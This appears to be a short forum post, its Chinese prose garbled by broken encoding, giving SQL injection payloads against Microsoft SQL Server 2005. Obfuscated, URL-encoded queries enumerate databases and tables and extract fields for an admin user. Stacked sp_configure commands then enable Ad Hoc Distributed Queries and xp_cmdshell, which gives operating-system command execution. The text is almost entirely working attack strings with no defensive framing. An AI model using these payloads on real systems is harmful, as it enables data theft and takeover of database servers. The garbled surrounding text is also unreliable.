MSsql2005ע
CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast(/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/../**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/../**/order/**/by/**/dbid/**/desc))%3d0--
,somedbҪеݿ⣬ɫ1ۼ
CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
ֶ䣬adminuser='icerover'
CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast(/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**//**/From/**/../**/Where/**/user='icerover'/**/Order/**/by/**/)/**/T/**/Order/**/by/**/Desc)%3d0--
mssql2005Ĭûпxp_cmdshellģopenrowsetҲ
saȨޣ
openrowset
CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
xp_cmdshell
CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
ok,over~~
ҳ:
[1]